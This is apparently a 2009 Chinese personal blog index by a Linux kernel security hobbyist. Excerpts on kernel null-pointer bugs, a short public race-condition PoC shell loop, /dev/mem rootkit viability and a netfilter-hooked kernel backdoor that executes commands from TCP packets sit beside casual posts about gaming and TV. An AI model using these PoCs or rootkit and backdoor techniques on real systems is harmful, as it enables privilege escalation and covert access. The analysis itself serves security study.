2009-11-10 09:29
漏洞公告是11.3号发出的, exp试了几个版本的都无效, 不过漏洞还是有的, 只是很难触发。公告上给出了一个poc:
http://www.nsfocus.net/vulndb/14025
while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 |
2009-10-28 20:04
最近都打星际去了, 忘了看书了, 不过水平大涨, 哈哈! |
2009-09-11 20:59
今天看《天天向上》,请来了一个搞运动的帅哥, 底下传了无数女生的尖叫。。。这个心理不平衡啊,这人长的帅就是惹女生喜欢啊。 这人要是不帅, 有钱也行啊。但是像我们这种没钱,没房,没车,长的又对不起mm的程序员来说,泡妞确实比写程序难多了。我们这群代码猴子整天对着屏幕,一坐就是几小时, 除了写代码外就是调试代码了。mm们不喜欢我们啊, 咋办。 你说这写程序怎么能泡上妞呢。 不管了, 打星际。。。 |
2009-09-07 09:19
udp_sendmsg空指针漏洞分析 by wzt
漏洞描述:
由于Linux ipv4协议栈中udp_sendmsg()函数设计上存在缺陷, 导致struct rtable *rt以空指针形式传递给ip_append_data(), 从而引发kernel oops,
攻击者可以利用此漏洞提升进程权限。漏洞影响2.6.19以下的版本。
漏洞成因:
>> linux+v2.6.18/net/ipv4/udp.c
int udp_sendmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len)
{
...
// rt被初始化成NULL
struct rtabl |
2009-08-19 12:00
Linux sock_sendpage空指针漏洞分析
>> linux-2.6.18/net/socket.c
static ssize_t sock_sendpage(struct file *file, struct page *page,
int offset, size_t size, loff_t *ppos, int more)
{
struct socket *sock;
int flags;
sock = file->private_data;
flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
flags |= MSG_MORE;
return sock->ops->sendpage(sock, page, offset, size, flags);
}
sock_send |
2009-08-19 10:02
广告一下:
如果您在使用阿里巴巴集团产品(阿里巴巴,淘宝,支付宝,雅虎口碑,阿里妈妈,阿里软件)过程中,发现了安全漏洞,请发送包含漏洞报告的邮件至
security@service.alibaba.com
我们会在收到报告后的下一工作日内我们会给您做出响应。我们确认漏洞如果是您首先发现的,我们将给予小礼品以示感谢。
对于所有为阿里巴巴产 |
2009-08-10 09:41
为了加强团队之间的合作, 我苦练星际好几天了, 星际高手指点下啊。 |
2009-07-07 16:35
因为这个选项, /dev/mem类型的rootkit很可能会再次发挥作用,它默认是没开启的。。。
kernel hacking -> Filter access to /dev/mem
不过rhel系列的内核已经开启了这个选项,所以还是很安全的。 大于1m的物理内存是不能被映射的, 因此想读内核空间是不可能的。
重新升级内核到2.6.30, 没开启filter选项, 又可以读写内核空间了。。。
看下代码/drivers/char/mem.c:
/*
* This funcion reads the *physical* memory. The f_pos points directly to the
* memory location. |
2009-06-20 21:34
最近发现一个哥们唱歌超好听,艺名叫舒克, 有前途。 |
2009-06-04 08:10
前几天看了rwrk这个rk的demo, 它就是利用netfilter hook住了进入主机的数据包, hook点是NF_IP_PRE_ROUTING, 因此可以在进入iptables之前提前实现数据包的过滤。在这个hook点上作文章就比较多了, 可以实现防火墙, 嗅探器, 当然也可以用来触发回连后门, wnps就是这么来作的, 因此不管主机防火墙作的规则如何变态, 都有机会穿透它。下面这个demo用来演示分析tcp包的内容, 分析出里面的命令, 然后去执行它, 有点类似以前的icmp, ip包后门, 只不过这些都在内核来完成, 功能更强大。
demo在ubuntu8.10 + 2.6.28上测试成功。 |
|
|
|